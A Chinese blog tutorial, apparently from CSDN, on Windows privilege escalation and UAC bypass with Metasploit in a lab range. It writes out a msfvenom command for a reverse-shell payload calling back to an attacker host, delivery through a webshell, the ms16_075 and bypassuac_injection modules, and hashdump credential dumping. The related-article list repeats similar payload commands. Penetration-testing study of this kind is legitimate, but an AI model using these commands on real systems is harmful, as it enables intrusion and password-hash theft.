metasploit进行windows提权 UAC绕过提权

最新推荐文章于 2023-09-01 19:07:10 发布
最新推荐文章于 2023-09-01 19:07:10 发布
阅读量2.4k 收藏 5
点赞数 2
分类专栏: metasploit 文章标签: windows 安全 kali linux 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nicai321/article/details/122771906
版权

文中主要讲解kali中metasploit的用法,通常我们简称MSF,通过学习了解MSF的各种命令小技巧,从而掌握后渗透技术。本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精;本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者无关。

MSF进行UAC绕过

首先通过kali来生成一个exe文件。

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.45.135 lport=12345 -f exe >sss.exe

在这里插入图片描述
将生成的文件上传通过webshell上传到服务器可执行目录上:
在这里插入图片描述
kali上使用use exploit/multi/handler模块,设置好参数,webshell上运行后,反弹session到kali
查看权限为IIS组权限,这里LHOST写错了:
在这里插入图片描述
使用backgrounp将session保存到后台。同样我们可以使用sessions -i 来进行查看。
在这里插入图片描述
使用 use post/multi/recon/local_exploit_syggester 或者在meterpreter中使用run post/windows/gather/enum_patches
msf6里面上述的命令无法直接看到可用的提权攻击载荷。可能是msf6的BUG吧。原因不明。
这里我们直接使用ms16-075模块进行提权。

use exploit/windows/local/ms16_075_reflection_juicy

只需要将之前的session在这个载荷中set Session 中添加即可。
运行后,成功反弹session,查看权限为系统权限。
在这里插入图片描述
使用ps查看进程,然后使用migrate PID号来迁移进程。
在这里插入图片描述
同样可以使用其余的办法去提权。
例如使用getsystem来提权,但此操作需要绕过UAC限制。

描述:

UAC(UserAccount Control,用户账户控制)简言之就是在Vista及更高版本中通过弹框进一步让用户
确认是否授权当前可执行文件来达到阻止恶意程序的目的。
在这里插入图片描述
为了远程执行目标的exe或者bat可执行文件绕过此安全机制,以此叫BypassUAC(不进行弹窗直接运行执行文件)
为了保证session的稳定性, 可以使用命令来提前迁移进程。
这种无法使用getsystem提权,也同样属于UAC限制。

set AutoRunScript migrate -f

但UAC提权,必须是在管理员组中,不能在通过webshell获得的IIS组权限,否则因权限太低会导致无法绕过UAC。

漏洞复现:

首先生成exe,在服务端点击,获取管理员组权限:
但这上面我们可以看出getsystem 无法使用。
在这里插入图片描述
通过search uac 来查看攻击载荷。并利用,可以看出已能直接绕过UAC 进行getsystem提权。但依然不能使用hashdump

use exploit/windows/local/bypassuac_injection

在这里插入图片描述
这个就可以使用ps查看下进程,然后将进程迁移到x64位的系统管理员权限进程中。成功使用hashdump
在这里插入图片描述

全局变量Global
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
操作系统权限提升(十三)之绕过UAC提权-MSF和CS绕过UAC提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-25 1348
该模块会创建一个可执行文件,目标机器会运行一个发起提升权限请求的程序,提示用户是否要继续运行,如果用户选择继续运行程序,就会返回一个system权限的shell。这个模块对用户没有要求,点击通过即可,但是会创建一个恶意文件,对该文件进行免杀即可。使用该模块提权的使用,当前用户必须是管理员组中的用户,UAC为默认设置。拿到一个普通管理员的SHELL,在CS中没有*号代表有UAC。执行添加用户的命令时显示拒绝访问。使用CS自带的插件进行绕过提权提权后可以完成添加用户的命令。生成一个MSF的SHELL。
Windows提权笔记-UAC绕过详解
墨痕诉清风的博客
03-12 271
用户帐户控制(UAC)是Microsoft在Windows Vista和Windows Server 2008中引入的访问控制系统。尽管UAC已经被讨论和调查了很长时间,但必须强调的是,微软并不认为它是一个安全边界。相反,UAC强制应用程序和任务在非管理帐户的上下文中运行,直到管理员授权提升的访问权限。它将阻止安装程序和未经授权的应用程序在没有管理帐户权限的情况下运行,并阻止对系统设置的更改。通常,UAC的效果是,任何希望执行具有潜在系统范围影响的操作的应用程序都不能默默地执行。至少在理论上是这样。
操作系统权限提升(十二)之绕过UAC提权-Windows UAC概述
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-03 2982
UAC(User Account Control),中文翻译为用户帐户控制,是微软在Windows Vista和Windows7中引用的新技术,主要功能是进行一些会影响系统安全的操作时,会自动触发UAC,用户确认后才能执行。因为大部分的恶意软件、木马病毒、广告插件在进入计算机时都会有如:将文件复制到Windows或Program Files等目录、安装驱动、安装ActiveX等操作,而这些操作都会触发UAC,用户都可以在UAC提示时来禁止这些程序的运行
Metasploit -- 利用cve-2018-8120提升权限
weixin_41489908的博客
05-09 736
其实我挺羡慕火车的,为什么?“他们连擦肩而过都那么久。。。。” ---- 网易云热评 一、生成木马 目标主机:192.168.1.129(win7 x64) 攻击机:192.168.1.33 攻击端口:12121 生成木马:msfvenom --arch x64 --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.133 lport=12121 -f exe -o /root/win64.exe...
Windows权限提升—BypassUAC、DLL劫持、引号路径、服务权限等提权
剁椒鱼头没剁椒的博客
03-29 1820
关于Windows提权应该这篇总结完就结束了,再次提醒一下关于第三方软件或插件提权,不是不写,而且有些软件都会自动更新,很多漏洞基本上很少遇到,同时也利用不了,比如说:向日葵有一个版本能够提权,但是现在那个版本装再电脑上,根本连接不上向日葵的服务器,更何谈提权呢,同时还可以看日志,目前日志也更改了,端口不会再日志中出现了。前面几篇文章我就汇总在下面了,同时关于UAC提权之前一篇文章写的没那么细,这里重新补充一下。Windows权限提升—令牌窃取、UAC提权、进程注入等提权
windows&linux;提权总结
04-24
- 熟悉权限提升的常见方法,包括Windows中的UAC绕过、服务配置错误、计划任务等。 - 对Linux系统中SUID/SGID位的滥用、内核漏洞、配置文件错误等技术的掌握。 需要注意的是,这些信息和方法不应被用于非法目的。在...
系统提权之:Windows 提权
f_carey的博客
11-04 2104
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 Windows 提权1 利用漏洞提权1.1 手工查找系统缺失补丁1.2 Windows 补丁审计工具1.2.1 Windows-Exploit-Suggester1.2.2 Sherlock1.3 MSF 模块查找可利用漏洞2 利用 Windows 配置错误提权2.1 系统服务权限配置错误2.1.1 利用 Po.
[网络安全自学篇] 九十四.《Windows黑客编程技术详解》之提权技术(令牌权限提升和Bypass UAC
热门推荐
杨秀璋的专栏
09-12 2万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。这篇文章将带着大家来学习《Windows黑客编程技术详解》,其作者是甘迪文老师,推荐大家购买来学习。作者将采用实际编程和图文结合的方式进行分享,并且会进一步补充相关知识点。第六篇文章主要介绍木马病毒提权技术,包括进程访问令牌权限提升和Bypass UAC,希望对您有所帮助。
精选_Bypass UAC 提权小结_源码打包
03-10
**Bypass UAC 提权小结** 用户账户控制(User Account Control,UAC)是微软在Windows Vista及后续操作系统中引入的一项安全特性,用于保护系统免受恶意软件的影响。它通过要求用户对需要管理员权限的操作进行确认...
内网渗透常用提权方式总结
j1044957016的博客
06-01 7485
内网菜鸡艰难学习,希望一样的菜鸡能省去打开一堆链接的时间吧
bat触发window UAC权限控制
06-02
直接在批处理文件中前面加入下面 加入你想要的bat命令
uacscript:Windows脚本主机中的Windows 7 UAC绕过漏洞
05-13
Windows脚本主机中的UAC绕过漏洞 Windows Script Host可执行文件由于缺少嵌入式清单而遭受漏洞攻击。 使用另一个漏洞利用程序,可以将“ wusa.exe”和“ makecab.exe”文件的组合复制到Windows文件夹中。 如果UAC设置为默认设置,清单和脚本主机的副本允许执行复制的脚本主机并绕过UAC警告消息。 ZDI和Microsoft都知道此问题,因此预期ZDI不接受许可,因为它不是远程漏洞。 令人惊讶的是,Microsoft不接受此漏洞,因为“ UAC不被视为安全边界”。 仅Windows 7易受攻击,Windows 8具有嵌入式清单,并且Windows 10未经测试。
使用MetasploitWindows7进行提权
zhanqinli的博客
04-21 637
8、可以查看到有多个模块可以使用,查看后面的描述来选择合适的,每个人的版本都可能不一样,因此漏洞也可能不一样,建议使用前几个模块来测试,不要问为什么(因为我后面都是试过了,都不行,或许你的可以动手试试吧。5、回到window7中,运行刚刚下载的shell文件,在kali中可以看到成功连接上了,然后在终端中输入whoami /groups可以查看当前用户权限,可以看到我们只是普通用户。9、 复制该路径,使用use 进入,设置session,然后执行。
【权限提升-Windows提权】-UAC提权MSF模块和UACME项目-DLL劫持-不带引号服务路径-不安全的服务权限
最新发布
xiaoheizi的博客
09-01 2244
1、具体有哪些权限需要我们了解掌握的?后台权限,网站权限,数据库权限,接口权限,系统权限,域控权限等2、以上常见权限获取方法简要归类说明?后台权限:SQL注入数据库备份泄露,默认或弱口令等获取帐号密码进入网站权限:后台提升至网站权限,RCE或文件操作类、反序列化等漏洞直达Shell数据库权限:SQL注入数据库备份泄露,默认或弱口令等进入或网站权限获取后转入接口权限:SQL注入数据库备份泄露,源码泄漏,培植不当等或网站权限获取后转入。
metasploit提升权限
星落的博客
05-24 1万+
实例演示-提权 1.获得system账号权限,直接获取会失败,以为win7以上版本电脑含有UAC,因此要绕过UAC。 getsystem 2.使用ask模块进行弹窗,受害人对电脑不了解,点击“是”,从而绕过UAC。 use exploit/windows/local/ask set session 1 run 受害者电脑会进行弹窗,点击允许,就可以提权了。 3.使用bypassuac模块,利用受信任的通过进程注入的发布者证书,他将产生一个关闭UAC标志的shell。 use ..
window绕开UAC——利用UAC白名单程序提权
甜筒八部 的专栏
11-18 7748
Se在实际开发过程中,可以通过Process Explorer检查服务或程序处于哪个Session,会不会遇到Session 0 隔离问题。我们在Services 中找到之前加载的AlertService 服务,右键属性查看其Session 状态。
提权学习之旅——利用Metasploit提权
Lemon's blog
08-16 701
1
使用kail中Metasploit获取Windows的权限并提权
yuchen的博客
01-07 1981
0x01 环境搭建 虚拟机:kali 虚拟机:win7 0x02 实际操作 1.生成木马 2.移动木马至/var/www/html目录下 3.给木马文件evil.exe加上X权限 4.kali需要开启Apache2服务 5.用windows打开kali得ip下载木马文件 6.提前查看postgresql运行状态/etc/init.d/postgresql status 打开postgresql数据库/etc/init.d/postgresql start 打开后才会出现绿点 7.开启MSF 8
msf内网提权
dreamthe的博客
11-22 2349
目录 1.利用木马文件拿到shell 2.利用ms_2018_8120提权 3.提高程序运行级别。 4.基于ms16_016提权 5.基于ms14_058提权 ​6.基于ms13_053提权 7.uac绕过 8.基于ms16_032提权 1.利用木马文件拿到shell 这里呢我们就不多说了,在上一篇文章里面我进行详细说明和演示。如果有不懂的朋友可以看上一篇的文章,上一篇文章:利用msfvenom生成木马文件反弹shell、meterpreter 简单系统命令_dreamthe的...
(1) 利用MS18-8120通过MetasploitWindows提权
05-10
MS18-8120是一个Windows提权漏洞,它可以影响Windows 7 SP1 x86和x64、Windows 8.1 x86和x64、Windows Server 2008 R2 SP1、Windows Server 2012和Windows Server 2012 R2。这个漏洞是在Windows内核中存在一个缺陷,攻击者可以利用这个缺陷来提升他们的权限,从而执行任意代码。 下面是一些利用MS18-8120漏洞进行Windows提权的步骤: 1.使用Metasploit框架:Metasploit是一个开源的渗透测试框架,它可以帮助安全专业人员快速、高效地发现和利用漏洞。在这个案例中,我们将使用Metasploit框架来利用MS18-8120漏洞。 2. 扫描目标:首先,我们需要扫描目标系统以检测是否存在漏洞。使用Nmap或其他扫描工具扫描目标IP地址,如下所示: ``` nmap -sV -O targetIP ``` 3. 打开Metasploit:打开Kali Linux操作系统并打开Metasploit框架,使用以下命令: ``` msfconsole ``` 4. 搜索漏洞利用模块:在Metasploit控制台中,使用以下命令搜索与MS18-8120漏洞相关的模块: ``` search MS18-8120 ``` 5. 选择漏洞利用模块:从搜索结果中选择一个适合我们的漏洞利用模块。在这个案例中,我们将选择“exploit/windows/local/ms18_8120_dcom”,使用以下命令: ``` use exploit/windows/local/ms18_8120_dcom ``` 6. 配置漏洞利用模块:在我们使用模块之前,我们需要配置一些参数。使用以下命令来查看可用的参数: ``` show options ``` 7. 配置目标IP地址和端口号:我们需要设置目标IP地址和端口号。使用以下命令设置目标IP地址和端口号: ``` set RHOST targetIP set RPORT targetPort ``` 8. 运行漏洞利用模块:设置完参数后,使用以下命令运行漏洞利用模块: ``` run ``` 9. 检查提权结果:漏洞利用模块运行后,我们可以检查提权结果。使用以下命令检查当前用户的权限: ``` getuid ``` 如果返回结果为“NT AUTHORITY\SYSTEM”,则说明我们已经成功提升了我们的权限。 总结: 通过使用Metasploit框架和MS18-8120漏洞利用模块,我们可以快速、高效地进行Windows提权攻击。但是请注意,任何未经授权的攻击都是非法的。只有在合法的渗透测试环境中使用这些技术。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

全局变量Global

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值